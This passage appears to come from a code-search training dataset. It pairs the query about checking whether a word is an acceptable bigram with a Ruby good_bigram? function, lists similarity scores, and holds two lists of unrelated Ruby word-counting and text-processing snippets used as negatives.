"def time_file (doc2, estimate)\n\n#Hash to store the count of [Next], [Submit], etc.\n\tcounthash = Hash.new\n\tcounthash[\"[Next]\"] = 0\n\tcounthash[\"[Submit]\"] = 0\n\n#TO DO: update so that it finds the search criteria from the entered keywords\n# Count the number of [Next]s, [Submit, Long]s\n# and multiply by the time assigned to each keyword\n\tdoc2.paragraphs.each do |p|\n\t\tcounthash[\"[Next]\"] += 6*p.to_s.scan(/(\\[(n|N)ext)|((n|N)ext\\])/).size\n\t\tcounthash[\"[Submit]\"] += estimate*p.to_s.scan(/\\[(S|s)ubmit/).size\n\tend\n\n#prints times associated with [Next], [Submit, *], etc.\n\treturn counthash\n\nend",
"def charFreq(someFile)\ntext = \"\"\nFile.open(someFile, 'r') do |file|\n text = file.to_a.to_s.downcase.gsub(/[^a-z\\s]/, '')\nend\n\nfreq = {}\nchar = text.split(\"\")\nfreq = char.uniq.each{|c| freq[c] = char.count(c)}\n\ncounts = {}\nfor c in char \n if counts.key?(c)\n counts[c] += 1\n else \n counts[c] = 1\n end\nend \n\nprint(counts)\nend",
"def count_frequencies s\n s.downcase.split(//).inject(Hash.new(0)) do |hash,item|\n hash[item] += 1\n hash\n end\n end",
"def word_count_mr\n self.words = Hash[self.class.where(:_id=>self.id).map_reduce(MapReduce::word_count(\"title\"),MapReduce::word_count_reduce).out(inline:1).collect { |x,y| [ x[\"_id\"],x[\"value\"][\"count\"].to_i ] }]\n end",
"def word_count(passage, unique: false)\n !unique ? strip_text(passage).count : strip_text_unique(passage).count# words = rows here\nend",
"def count_words(string)\n#names=string.downcase.split(/\\W+/)\n#puts names\ncounts = Hash.new(0)\nstring.downcase.split(/\\W+/).each { |name| counts[name] += 1 }\nputs counts\nend",
"def count_words(phrase)\r\n words_hash = Hash.new(0)\r\n phrase.split(\" \").each do |word|\r\n words_hash[word.downcase]+=1\r\n end\r\n print_word_count(words_hash)\r\n return words_hash\r\nend",
"def words_count\n get_at_words_count + \n get_ata_words_count + \n get_noun_words_count + \n get_adjective_words_count\n end",
"def count_sentences(some_file)\n file_content = open(some_file).read()\n count = 0\n\n file_content.each_char do |c|\n count += 1 if c == \",\" || c == \"?\" || c == \"!\"\n end\n return count\nend",
"def calculate_word_count\n 0x0A\n end",
"def ngram_counts_context(str, n)\n seqs = word_seqs(str)\n cnts = Hash.new(0.0)\n seqs.each do |words|\n next if words.length<n\n toks = words.map(&:downcase)\n shifted = []\n (1...n).each{ |i| shifted << toks[i..-1] }\n n_grams = toks.zip(*shifted).select{ |n_gram| n_gram.select{ |w| w=~ /^[[:alpha:]]+$/ }.length==n }\n n_grams.each{ |n_gram| cnts[\"#{n}w:#{n_gram.join('_')}\"]+=1 }\n end\n cnts\n end",
"def scanner\n @sentences ||= File.open(@path) do |file|\n file.each_line.each_with_object([]) do |line, acc|\n stripped_line = line.strip\n\n unless stripped_line.nil? || stripped_line.empty?\n acc << line.split(' ').map do |word|\n word.split('/').first\n end.join(' ')\n end\n end\n end\n\n end",
"def readwordfile name\r\n\t\t \tl_num=0\r\n\t\t File.open(name).each do |l|\r\n\t\t \t@wordtable[l_num] = l.gsub(\"\\r\",\"\").gsub(\"\\n\",\"\")\r\n\t\t l_num +=1\r\n\t\t end\r\n\t\t return l_num\r\n\t\t end",
"def calculate_word_frequency\n # not a class method, it is used to poulate what are essentially properties on an instance of the class\n #word_frequency = @content.split(\" \").each_with_object(Hash.new(0)) {|word,count| count[word] +=1}\n word_frequency = Hash.new(0)\n #puts word_frequency\n @content.split.each do |word|\n word_frequency[word] += 1\n end\n\n\n @highest_wf_count = word_frequency.values.max\n @highest_wf_words = word_frequency.select { |word, freq| freq == @highest_wf_count }.keys\n @highest_wf_words\n\n end",
"def occurences(file) # \n fileString = File.read(file).to_s # the text of the file is stored\n fileString = fileString.chars.sort.join # we sort it\n #puts \"the ordered charactors are\" # \n #puts fileString # \n write_handler = File.new(file+\"_result.out\", \"w\") # create a new file called that _out\n\n # \n result = \"\" # \n values = Hash.new(0) # create new hashtable\n fileString.chars.each do |char| # for each of the chara\\actors\n values[char.to_s] +=1 # add it to the hash\n end # \n values = values.sort_by {|_key, value| value} # sort by lmost common letter\n values = values.reverse # reverse it\n values.each do |val| # for each value\n write_handler.puts val[1].to_s+ \":\"+val[0].to_s # add it to the new file\n end # end\n write_handler.close # close file\n return result # return resullt\nend",
"def count_words(string)\r\n texts = string.split(\" \").map(&:downcase)\r\n result = texts.each_with_object(Hash.new (0)) {|item, hash| hash[item] += 1}\r\n result.each do |key, value|\r\n puts \"#{key} #{value}\"\r\nend\r\nend",
"def word_count_engine(document)\n document = document.gsub(/[^ 0-9A-Za-z]/, '').downcase.split(' ')\n\n store = {}\n max = 0\n\n document.each do |element|\n if store[element]\n store[element] += 1\n max = [store[element], max].max\n else\n store[element] = 1\n max = 1 if max == 0\n end\n end\n\n buckets = Array.new(max) { [] }\n\n store.each do |key, value|\n buckets[max - value].push([key, value.to_s])\n end\n\n buckets.flatten(1)\nend",
"def count\n self.wordcounts.map(&:count).inject(0, :+)\n end",
"def count_words\n @clustered_tweets.each do |cluster, tweets|\n next if cluster == -1 # <--- Skip noise cluster!\n next if cluster == nil # <--- Skip tweets without cluster!\n cluster_wordcounts = Hash.new(0)\n tweets.each do |tweet|\n tweet.text_cleaned.split.each do |token|\n cluster_wordcounts[token] += 1 \n @total_wordcounts[token] += 1\n @total_words += 1\n @cluster_words[cluster] += 1\n end\n @clustered_wordcounts[cluster] = cluster_wordcounts\n end\n end\n end",
"def printWords(file, lines, htmlOutput=false) \ntranslated = []\nFile.open(\"german_vocabulary.c\") { |german| \n translated = german.readlines.collect { |l|\n if l =~ /\\{\"[^\"]*\", (\"[A-Z0-9_]+\")/ then\n $1\n end\n }.uniq\n}\n\ncount = 0\nlines.each { |line|\n if line =~ /\\#define.*NAM_.*(\".*\")/ then\n if not translated.include? $1 then\n puts $1+' nicht uebersetzt!' unless htmlOutput\n count += 1\n end\n end\n}\n\nif htmlOutput then\n puts '<tr>'\n puts ' <td>'+file+'</td>'\n puts ' <td align=\"right\">'+lines.size.to_s+'</td>'\n puts ' <td align=\"right\">'+count.to_s+'</td>'\n puts ' <td align=\"right\">'+sprintf(\"%4d\", lines.size-count)+'</td>'\n puts ' <td align=\"right\">'+sprintf(\"%2g\", (lines.size-count)*100.0/lines.size)+'</td>'\n puts '</tr>'\nelse\n puts\n puts \"Gesamtzahl: \"+sprintf(\"%4d\", lines.size.to_s)\n puts \"Nicht uebersetzte Wort: \"+sprintf(\"%4d\", count.to_s)\n puts \"Uebersetzte Worte: \"+sprintf(\"%4d\", lines.size-count)\n puts \"Prozentual uebersetzt: \"+sprintf(\"%2g\", (lines.size-count)*100.0/lines.size)\nend\n\nend",
"def word_sizes(words)\n count_hash = Hash.new(0)\n words.split.each do |word|\n clean_word = word.delete('^a-zA-Z')\n count_hash[clean_word.size] += 1\n end\n count_hash\nend",
"def analyze_text(text)\n {\n :line_count => (text.split(/\\n/).last.chomp.empty? ? text.scan(/\\n/).count + 1 : text.scan(/\\n/).count),\n :character_count => text.length,\n :character_count_excluding_spaces => text.scan(/\\S/).length,\n :word_count => text.split(' ').length,\n :sentence_count => text.split(/[\\.?!]/).length,\n :paragraph_count => text.split(/\\n\\r/).length\n }\nend",
"def count_words(s)\n\ts = s.downcase\n\ts.gsub!(/\\W+/,\" \")\n\ts = s.split(\" \")\n\tfreqs = Hash.new(0)\n\ts.each{ |word| freqs[word] += 1 }\n\treturn freqs\nend",
"def calculate_total_seqs\n file_summaries.sum(&:seqs)\n end",
"def word_sizes(str)\n counts = Hash.new(0)\n if str == \"\"\n return {}\n else\n str.gsub!(/[^0-9A-Za-z\\s]/, \"\").split.each do |word|\n counts[word.size] += 1\n end\nend\n counts\n\nend"
] | [
"0.6511316",
"0.63263327",
"0.6272771",
"0.62173015",
"0.6199744",
"0.6187189",
"0.6135399",
"0.61326754",
"0.6131588",
"0.61292493",
"0.6123231",
"0.60655224",
"0.6043474",
"0.6039884",
"0.60201246",
"0.60042804",
"0.59944147",
"0.59934443",
"0.599198",
"0.59612584",
"0.5914988",
"0.5909988",
"0.58903164",
"0.5885001",
"0.5833632",
"0.5825421",
"0.57108814",
"0.5703339",
"0.5693465",
"0.56828773",
"0.56780374",
"0.5669561",
"0.56678027",
"0.5635732",
"0.5612363",
"0.5611247",
"0.5599882",
"0.55957603",
"0.55903083",
"0.5587402",
"0.55624115",
"0.553539",
"0.5494202",
"0.54075813",
"0.5406101",
"0.540432",
"0.53987455",
"0.53945094",
"0.5385658",
"0.53625256",
"0.5361262",
"0.5349742",
"0.533589",
"0.5331881",
"0.53288084",
"0.53245527",
"0.5323564",
"0.5323239",
"0.5319054",
"0.53178644",
"0.53148663",
"0.53001434",
"0.5299404",
"0.5297997",
"0.5291313",
"0.5289322",
"0.5288539",
"0.5286719",
"0.5285855",
"0.52809554",
"0.5273894",
"0.52736235",
"0.5270918",
"0.52619123",
"0.525891",
"0.5254168",
"0.5249843",
"0.52411866",
"0.5236999",
"0.5231903",
"0.5226478",
"0.5217072",
"0.52169794",
"0.5214917",
"0.5212541",
"0.52051944",
"0.52026963",
"0.5197943",
"0.51927954",
"0.51895064",
"0.51819193",
"0.5172649",
"0.51706195",
"0.51579964",
"0.5157293",
"0.5143905",
"0.51438844",
"0.51334673",
"0.5127685",
"0.5121705"
] | 0.6242591 | 3 |
Check if a given word should be considered an acceptable bigram. | def good_bigram?(word)
return false if REJECT_BIGRAMS.include?(word)
return false if word.size < 2
true
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def legal_word?(word)\n word.length >= 5 && word.length <= 12\n end",
"def is_word?(word)\r\n word = word.downcase\r\n word.each_char { |c| return false if not is_letter?(c) }\r\n !word.empty?\r\n end",
"def isAntigram(comparedWord)\n String.chars.each(comparedWord)\n end",
"def block_word?(string)\n hash = { 'B' => 'O', 'G' => 'T', 'V' => 'I', \n 'X' => 'K', 'R' => 'E', 'L' => 'Y',\n 'D' => 'Q', 'F' => 'S', 'Z' => 'M',\n 'C' => 'P', 'J' => 'W', 'N' => 'A', 'H' => 'U'}\n\n banned_letters = []\n bool = true\n letters = string.upcase.chars\n letters.each do |letter|\n if hash.has_key?(letter)\n banned_letters << hash[letter]\n elsif hash.has_value?(letter)\n banned_letters << hash.key(letter)\n end\n end\n banned_letters.each do |letter|\n if letters.include?(letter)\n bool = false\n break\n else\n next\n end\n end\n bool\nend",
"def block_word?(word)\n letters = BLOCKS.dup\n chars = word.upcase.chars\n\n chars.each do |char|\n return false unless letters.join.include?(char)\n letters.delete_at(letters.join.index(char)/2)\n end\n\n true\nend",
"def valid_word_guess?(guess)\n if !guess.match?(/\\A([a-z]|[-]|\\d){2,}\\z/) \n puts \"Not a legal word guess! Guess again.\"\n return false\n elsif @incorrect_guesses.include?(guess) || @correct_guesses.include?(guess)\n puts \"You already guessed that word. Guess again.\\n\\n\"\n return false\n else\n return true\n end\n end",
"def check_word(word)\n letters = make_letter_array(@tiles)\n w = word.split(\"\")\n for letter in w\n if letters.index(letter)\n letters[letters.index(letter)] = nil\n letters.compact!\n else\n return false\n end\n end\n return true\n end",
"def cap?(word)\n\t\treturn true if !$dont_cap.include?(word)\n\tend",
"def check_word(word)\n valid_words.include?(word)\n end",
"def block_word?(str)\n return false unless str.chars.uniq.size == str.size\n char_arr = str.upcase.chars\n char_arr.none? { |char| char_arr.include?(BLOCK_PAIRS[char]) }\nend",
"def block_word?(string)\n string_cap = string.upcase\n spelling_blocks = \"BO GT VI XK RE LY DQ FS ZM CP JW NA HU\"\n spelling_blocks.split.none? { |block| string_cap.count(block) >=2}\nend",
"def has_bad_word(str)\n #Turn string (url or body) into UTF-8 and lower case\n new_str = str.force_encoding(\"UTF-8\").downcase\n bad_words = [\"spongebob\",\n \"britney spears\",\n \"paris hilton\",\n \"norrköping\"]\n return bad_words.any? { |word| new_str.include?(word) }\nend",
"def letter_in_word?(letter)\n end",
"def pangram?(str)\n letters = \"abcdefghijklmnopqrstuvwxyz\".split(\"\")\n\n str.downcase!\n\n letters.all? { |letter|\n str.include? (letter)\n }\nend",
"def legal?(word)\n\t\tself.is_length(word) && self.letters?(word) && self.duplicates?(word) # Will return true or false if given word is legal/not legal\n\tend",
"def easy_block_word?(word)\n word.chars.all? { |letter| BLOCKS.join.include?(letter) }\nend",
"def validate_word_match\n if valid_word?(@word)\n return true\n else return false \n end#this should be returning true or false\n end",
"def pangram?(s)\n y = s.downcase.split(//).sort.uniq\n y.keep_if { |i| i =~ /[a-z]/ }\n y.length == 26 ? true : false\nend",
"def validate_word(word)\n\n # Remove the spaces from the ends of the words and chop it into characters\n chars = word.chomp.split('')\n invalid = false\n\n # Check if the word or input is 5 characters, Reject it if its not\n if chars.length != 5\n invalid = true\n end\n\n # See if the character appears in the word more than once, otherwise use regex`s to test for numbers and characters\n # The first regex uses the shorthand \\W which looks for anything that is NOT [0-9a-zA-Z_] as a quick way to wittle\n # out characters such as !@. The second looks for anything that IS a number. the match method is used to check if\n # your character matches any of the regex conditions.\n # It is worth noting these checks will always be run UNLESS invalid has already been flipped to true.\n # If any of these evaluate, flip invalid to true\n chars.each do |char|\n unless invalid\n invalid = true if word.count(char) > 1 || char.match(/\\W/) || char.match(/[0-9]/)\n end\n end\n\n #return wether the word is valid or not the word is valid\n return invalid\n\n end",
"def proper(word)\n /[[:upper:]]/.match(word) != nil\n end",
"def is_word(word)\n if @trie.has_key?(word) == true && word.length > 2 && @words.include?(word) == false\n return true\n else\n return false\n end\nend",
"def is_valid_word?(word)\n DICTIONARY.include?(word)\n end",
"def word?(token)\n token =~ /^[A-Za-z]+$/\n end",
"def valid_word?(word, inner_letter, outer_letters)\n word.include?(inner_letter) && word.chars.uniq.all? {|l| @all_letters.chars.include?(l) }\n end",
"def check_word(str, word)\n if str == word\n puts \"Congratulations! You guessed my word correctly!\" \n @game_is_over = true\n else\n false\n end\t\n end",
"def block_word?(word)\n blocks = [%w(b o), %w(x k), %w(d q), %w(c p), %w(n a), %w(g t),\n %w(r e), %w(f s), %w(j w), %w(h u), %w(v i), %w(l y),\n %w(z m)]\n word.each_char do |chr|\n matching_block = blocks.find do |block|\n block.include?(chr.downcase)\n end\n if matching_block\n blocks.delete(matching_block)\n else\n return false\n end\n end\n \n true\nend",
"def invalid_word? word\n\t\tstopwords_list.collect{ |w| w if w.include? word.to_s.strip }.uniq.any?\n\tend",
"def negative?(word)\n [ 'dull',\n 'boring',\n 'annoying',\n 'chaotic'\n ].include?(word)\nend",
"def block_word?(string)\n letter_groups = %w(bo xk dq cp na gt re fs jw hu vi ly zm)\n letter_groups.map! do |letters|\n [letters, 'free']\n end\n\n blocks = letter_groups.to_h\n \n string.chars.each do |char|\n blocks.keys.each do |letters|\n if letters.include?(char.downcase)\n return false if blocks[letters] == 'used'\n blocks[letters] = 'used'\n end\n end\n end\n true\nend",
"def check_word(word)\n if self.player.word_list.include?(word)\n puts \"Already found that one!\"\n elsif word.length < 4\n puts \"That word is too short. Words must be 4 letters or longer.\"\n elsif word.chars.include?(self.board.inner_letter) == false\n puts \"Missing center letter.\"\n elsif self.board.word_list.include?(word)\n #get points total for word\n points = self.board.get_word_value(word)\n self.player.add_points(points)\n #adds word to wordlist\n self.player.add_word(word)\n if self.board.pangram?(word)\n puts \"🐝 PANGRAM FOUND 🐝\"\n puts \"The bees are pleased. #{points} added to your score.\"\n else\n puts \"#{self.nice_messages.sample} #{points} point#{\"s\" if points > 1} added to your score.\"\n end\n self.player.display_total\n else\n puts \"Not in word list :(\"\n end\n end",
"def words_the_same?(word_to_test)\n word_to_test.downcase == @word.downcase\n end",
"def word? word = ''\n is? :word, word\n end",
"def valid_word?(word)\n # Cleaner implementation, but less readable\n # (word.empty? && @is_complete_word) || (@sub_tries.key?(word[0]) &&\n # @sub_tries[word[0]].valid_word?(word[1..-1]))\n\n # TODO: Find a way to refactor this such that it looks cleaner while remaining readable\n if word.empty?\n @is_complete_word\n elsif @sub_tries.key?(word[0])\n @sub_tries[word[0]].valid_word?(word[1..-1])\n else\n false\n end\n end",
"def unigram_exists(word)\n\t$unigrams.each do |x|\n\t\tif x.matches(word)\n\t\t\tx.increase_count\n\t\t\treturn true\n\t\tend\t\n\tend\n\treturn false\nend",
"def anagram?(word)\n normalize(word) == normalize(@word)\n end",
"def block_word?(input)\n blocks = %w(bo xk dq cp na gt re fs jw hu vi ly zm)\n lowercase_input = input.downcase\n result = ''\n lowercase_input.each_char do |char|\n blocks.each do |block|\n if block.include?(char)\n result << char\n blocks.delete(block)\n end\n end\n end\n result == lowercase_input\nend",
"def valid_word?(spelling)\n return false unless super(spelling)\n\n return true if lexicon.member?(spelling)\n\n STEM_ENDINGS.each do |e|\n stem = spelling.chomp(e)\n return true if lexicon.member?(stem)\n end\n\n false\n end",
"def is_a_letter?(guess)\n return true if @word.include?(guess)\n return false\n end",
"def block_word?(str)\n ltrs = {\"B\"=>\"O\", \"X\"=>\"K\", \"D\"=>\"Q\", \"C\"=>\"P\", \"N\"=>\"A\", \"G\"=>\"T\", \"R\"=>\"E\", \"F\"=>\"S\", \"J\"=>\"W\", \"H\"=>\"U\", \"V\"=>\"I\", \"L\"=>\"Y\", \"Z\"=>\"M\" }\n list = str.upcase.split(\"\")\n list.each do |ltr|\n if ltrs.value?(ltr) || ltrs.key?(ltr)\n ltrs.delete_if{|k,v| k == ltr || v == ltr}\n else return false end\n end\n true\nend",
"def possible_palindrome?(word)\n nb_each_letters(word).one?(&:odd?) ||\n nb_each_letters(word).all?(&:even?)\nend",
"def CheckValidWord(word)\n letters = \"abcdefghijklmnopqrstuvwxyz\" # String that contains all of the letters of the alphabet, used to check for invalid words\n valid = true\n word = word.chomp.downcase\n if (word.split(//).size != 5) # If the size of the word is not 5 (this game only accepts 5 letter words) the words doesn't pass this check\n valid = false\n end\n word.split(//).each do |letter| # The word is split into letters and each letter is checked for validity\n if (word.count(letter.to_s)) > 1 # If the letter occurs more than once in the word, it doesn't pass this check\n valid = false\n end\n if (letters.include?(letter) == false) # If the letter isn't in \"letters\" is doesn't pass this check\n valid = false\n end\n end\n return valid # Returns the value of valid. Note: if a word/letter fails even one check, this value will be false\nend",
"def triangular_word?(str)\nend",
"def filter_invalid_word(word)\n # Define a string which includes all valid letter\n letters = \"abcdefghijklmnopqrstuvwxyz\"\n # Define return variable and give a default value\n valid = true\n # transfer the word to lowercase and take out off \\r\\n\n word = word.chomp.downcase\n # set return value as false if the length of word not exactly equal 5\n if (word.split(//).size != 5)\n valid = false\n end\n # loop each word\n word.split(//).each do |letter|\n # If the letter occurs more than once in the word, set return value to false\n if (word.count(letter.to_s)) > 1 \n valid = false\n end\n # If the letter does not included in valid letter, set return value to false\n if (letters.include?(letter) == false) \n valid = false\n end\n end\n # return a bool value to method\n return valid\n end",
"def word_has?(letter)\n @word.include? letter\n end",
"def anagram_word?(test_word)\n sort_word(@word) == sort_word(test_word)\n end",
"def is_possesive? word\n return true if $possesive_words.include? word.downcase\n return false\n end",
"def check(word)\n\t\tresult = find_word(word)\n\t\treturn \"NO SUGGESTION\" if result.empty?\n\t\t# if the word is in the results, just return it\n\t\treturn word if result.include? word\n\t\tmatches = result.grep(/^#{word}$/i)\n\t\t# if the word is there with swapped caps, return that\n\t\treturn matches.first if matches.size > 0\n\t\t# else return the first one\n\t\t# FIXME: simple selection of a \"good\" match. must improve it!\n\t\tresult.first\n\tend",
"def has_a_b?(word)\n if /b/.match(word)\n puts 'We have a match'\n else\n puts 'No match here...'\n end\nend",
"def secret_word_guessed?\n\t\t@secret_word.split(\"\").all? { |letter| @guessed_letters.include?(letter) }\n\tend",
"def gram? = unit == 'gram'",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def clean?( text )\n @clean_calls += 1\n @banned_words.each do |word|\n return false if text =~ /\\b#{word}\\b/\n end\n true\n end",
"def guessed?\n \t(word.split('') - selected_letters).empty?\n\tend",
"def is_word(word)\n\t lt = @children\n\t word.each_char { |c|\n\t\t if lt[c]\n\t\t\t lt = lt[c]\n\t\t\telse\n\t\t\t\treturn nil\n\t\t\tend\n\t\t}\n\t\tlt.word\n\tend",
"def rhyme?(a,b)\n as = a.gsub /\\W/,\"\"\n bs = b.gsub /\\W/,\"\"\n as.to_phrase.rhymes.flatten.join(\", \").include?(bs.to_phrase.rhymes.flatten.join(\", \")) &&\n (as.length + bs.length < 140)\nend",
"def block_word?(str)\n hsh = {\n 'B' => 'O',\n 'G' => 'T',\n 'V' => 'I',\n 'X' => 'K',\n 'R' => 'E',\n 'L' => 'Y',\n 'D' => 'Q',\n 'F' => 'S',\n 'Z' => 'M',\n 'C' => 'P',\n 'J' => 'W',\n 'N' => 'A',\n 'H' => 'U'\n }\n\n str.upcase.chars.each do |char|\n if hsh.keys.include?(char)\n hsh.delete(char)\n elsif hsh.values.include?(char)\n hsh.delete(hsh.key(char))\n else\n return false\n end\n # p hsh\n end\n true\nend",
"def triangular_word?(word)\n encoded = encode(word)\n triangular_num?(encoded)\nend",
"def palindrome_sentence? str\n short = str.gsub /[^a-zA-Z]/, \"\"\n palindrome_word? short\nend",
"def term_acceptable(t)\n if t.length < 3\n return false # too short, unacceptable\n elsif @stopwords.include?(t)\n return false # stopword, unacceptable\n else\n if (t =~ /\\d/) != 0\n return true # doesn't start with digit, acceptable\n else\n return 10*t.scan(/\\d/).length < 4*t.length # < 40% digits, acceptable\n end\n end\n end",
"def check_guess\n\t\t@word.include?(@guess)\n\n\tend",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def word_has?(letter)\r\n @word.include?(letter)\r\n end",
"def word_has?(letter)\n @word.include?(letter)\n end",
"def is_word?(fragment)\n dictionary.include?(fragment)\n end",
"def check_input(input_word)\n # Define a string which includes all valid letter\n dict = \"abcdefghijklmnopqrstuvwxyz\"\n # Define return variable and give a default value\n is_valid = true\n # set return value as false if the length of word not exactly equal 5\n if(input_word.split(//).size != 5)\n is_valid = false\n end\n # If the letter occurs more than once in the word, set return value to false\n # include? method to find if a letter is included in input_word\n input_word.split(//).each do |letter|\n if(dict.include?(letter) == false)\n is_valid = false\n end\n end # end of the each method\n return is_valid\n end",
"def block_word?(string)\n up_string = string.upcase\n BLOCKS.none? { |block| up_string.count(block) >= 2 }\nend",
"def clean?( text )\n\t\t@clean_calls += 1\n\t\t@banned_words.each do |word|\n\t\t\treturn false if text =~ /\\b#{word}\\b/\n\t\tend\n\t\ttrue\n\tend",
"def compare(word1, word2)\n bigram_compare(bigramate(word1), bigramate(word2))\n end",
"def match?(string)\n bigrams = get_bigrams(string)\n while bigrams.length > 1\n pair = bigrams.shift\n return true if bigrams[1..-1].include?(pair)\n end\nend",
"def anagrams?(word1, word2)\n if word1.length != word2.length\n return false\n end\n word1.each_char do |ele|\n if !word2.include?(ele)\n return false\n end\n end\n return true\nend",
"def screaming?(word)\n word_array = word.split(//)\n word_array[-1] == \"!\"\nend",
"def end_word?(word)\n !word.nil? && !(word =~ /^*+[?\\.!]$/).nil?\n end",
"def is_antigram? ()\n if (self.is_anagram? == \"These words are not anagrams\")\n @word1_letters.each do |letter|\n if (@word2_letters.include?(letter))\n return \"These words are not antigrams\"\n end\n end\n return \"These words are antigrams\"\n else\n return \"This word can't be an antigram since it is an anagram\"\n end\n end",
"def is_palindrome?(word)\n\n\n #\n # raise ArgumentError if !word.is_a?(String)\n # downcased_word = word.downcase.gsub(/\\W/,\"\")\n # return false if downcased_word.length < 2\n # downcased_word == downcased_word.reverse\n\n if word.class == String\n no_white_spaces = word.strip\n if no_white_spaces.to_i == 0 && no_white_spaces.length > 1 && no_white_spaces.length < 20\n no_white_spaces === no_white_spaces.reverse\n else\n return false\n end\n else\n raise ArgumentError\n end\nend",
"def triplets?(string)\n bigrams = get_bigrams(string)\n bigrams.each_with_index do |bigram, index|\n return false if index == bigrams.length - 1\n return true if bigram[0] == bigrams[index + 1][1]\n end\n false\nend",
"def is_word?\n not is_punctuation?\n end",
"def contains_anagrams?\n @phrase.split().group_by{ |e| e.chars.sort }.select{ |k, v| v.size > 1 }.any?\n end",
"def clean?( text )\n @clean_calls += 1\n @banned_words.each do |word|\n return false if text =~ /\\b#{word}\\b/\n end\n true\n end",
"def palindrome_word?(word)\n normalized = word.downcase\n normalized.reverse == normalized\nend",
"def antigram?\n (@first.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\") & @second.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\")).empty?\n end",
"def block_word?(string)\nblocks = [['B','O'], ['X','K'], ['D','Q'], ['C','P'], ['N','A'], ['G','T'], ['R','E'], ['F','S'], ['J','W'], ['H','U'],\n['V','I'], ['L','Y'], ['Z','M']]\nresult = []\nchars_array = string.chars\nblocks.each do |sub_array|\n chars_array.each do |letter|\n if sub_array.include?(letter.upcase)\n result << sub_array\n end\n end\nend\nresult == result.uniq ? true : false\nend",
"def is_word?(word)\n Constants::DICTIONARY.key?(word.downcase)\n end",
"def check_guess(word, guess)\n if word.include? guess\n @correct_guess = true\n\n elsif !word.include? guess\n @correct_guess = false\n end\nend",
"def mis_ramos\n\n\tend",
"def reserved_word?(str)\n RESERVED_WORDS.include?(str.downcase)\n end",
"def contains?(word)\n if word.length > 0\n if /lab/ =~ word\n puts \"#{word} contains the string 'lab'\"\n else\n puts \"Not in that word.\"\n end\n else\n puts \"Please specify a word.\"\n end\nend",
"def check_word(word, rack)\n if rack.include?(\"?\") ? blank_tile = true : blank_tile = false\n end\n # Make a copy of rack to use to change values.\n rack_copy = rack.clone\n # result equals true and only goes false if a letter from rack isn't in the word\n result = true\n word.chars do |letter|\n if rack_copy.include?(letter)\n # Find the first instance of letter by its index and delete it at index.\n # This must be down to avoid .include? returning true on a letter multiple\n # times\n rack_copy.delete_at(rack_copy.index(letter))\n # If the letter isn't in rack but theres a blank tile then go back to start\n # of loop\n elsif blank_tile\n # change to false to avoid using blank tile more than once\n blank_tile = false\n # if the letter doesn't exist than turn result to false and break loop\n else\n result = false\n break\n end\n end\n result\nend",
"def gentle?\n words.any?(&:is_positive?) || (length > 35)\n end",
"def pangram (instr)\n return (instr.split().join().downcase.split(\"\").uniq.length ==26) \nend",
"def valid_words(rack)\n # Load the words\n list_of_words = load_words\n array_of_valid_words = []\n # for each word check if all the letters of word are in rack\n list_of_words.each do |word|\n array_of_valid_words << word if check_word(word, rack)\n end\n array_of_valid_words\nend",
"def is_palindrome?(word)\nend",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def is_all_this_letter?(word, character)\n a = is_all_as?(word)\n\n end",
"def round_over?\n is_word?(fragment)\n end",
"def valid_word?(word, letters)\n # take the word from user and split into Array of each letter\n input_word = word.upcase.split('')\n # iterate over the array of letters then\n # .all? checks each condition, returns T/F >>>\n # count of characters in input and the array @letters\n input_word.all? { |letter| input_word.count(letter) <= letters.count(letter) }\n end",
"def match?(longer_word, shorter_word = \"\")\n index = shorter_word.length - 1\n match = true\n temp = longer_word.dup\n while(index > -1 && match)\n if temp.include?(shorter_word[index])\n char = shorter_word[index]\n long_string_index = temp.index(char)\n temp[long_string_index] = ''\n index -= 1\n else\n match = false\n end\n end\n match\n end",
"def word_check(word)\n if word.length > 6\n return \"long\"\n elsif word.length < 6\n return \"short\"\n else\n return \"medium\"\n end\nend",
"def word_check(word)\n if word.length > 6\n return \"long\"\n elsif word.length < 6\n return \"short\"\n else\n return \"medium\"\n end\nend",
"def guessbrian(guess)\n #error checking\n if guess == nil || guess == \"\" || guess =='%'\n throw :guess\n end\n #initialize variables and split\n guess = guess.downcase\n flag = 0\n splitWord = @word\n splitWord = splitWord.downcase.split(\"\")\n #check and assign\n splitWord.each { |x|\n if x == guess\n flag = 1\n end\n }\n if flag == 1\n if @guesses == guess\n return false\n else\n @guesses << guess\n return true\n end\n else\n if guess == guess.gsub(/[^A-Za-z]/, '') && guess != @wrong_guesses\n @wrong_guesses << guess\n return true\n else\n return false\n end\n end\n end",
"def submit_word(word)\n letters_present_for(word) && @dictionary.include?(word)\n end"
] | [
"0.68942183",
"0.6835693",
"0.6639274",
"0.66050166",
"0.6576086",
"0.65585697",
"0.6549153",
"0.6535717",
"0.6491158",
"0.64656204",
"0.6460502",
"0.6431451",
"0.6418429",
"0.63703954",
"0.6333066",
"0.6326551",
"0.63233995",
"0.6312795",
"0.63071555",
"0.63029563",
"0.6286455",
"0.6268166",
"0.6256781",
"0.6224777",
"0.6224659",
"0.62149936",
"0.62114453",
"0.620889",
"0.6208385",
"0.6194492",
"0.6192301",
"0.61913335",
"0.6167454",
"0.61502504",
"0.613346",
"0.61275226",
"0.61164683",
"0.61122817",
"0.61086655",
"0.6078947",
"0.6076395",
"0.6076158",
"0.6072577",
"0.60649586",
"0.60609907",
"0.6060688",
"0.6039164",
"0.6036961",
"0.60340935",
"0.6028691",
"0.6028652",
"0.6018397",
"0.6017016",
"0.6004086",
"0.59941673",
"0.5990706",
"0.5979366",
"0.5975477",
"0.5972338",
"0.59680194",
"0.59651524",
"0.5951503",
"0.59462386",
"0.5941124",
"0.59388864",
"0.59346664",
"0.5927562",
"0.5922835",
"0.5922458",
"0.5912965",
"0.59068424",
"0.59057266",
"0.59024376",
"0.5882004",
"0.58772856",
"0.58769625",
"0.58745044",
"0.5873233",
"0.58714104",
"0.58659124",
"0.58636075",
"0.5843448",
"0.58424073",
"0.58396363",
"0.5836024",
"0.5833918",
"0.58320105",
"0.5827464",
"0.58254874",
"0.582216",
"0.58217305",
"0.58214",
"0.58173364",
"0.58150744",
"0.58132905",
"0.580409",
"0.5787412",
"0.5787412",
"0.57827616",
"0.57819676"
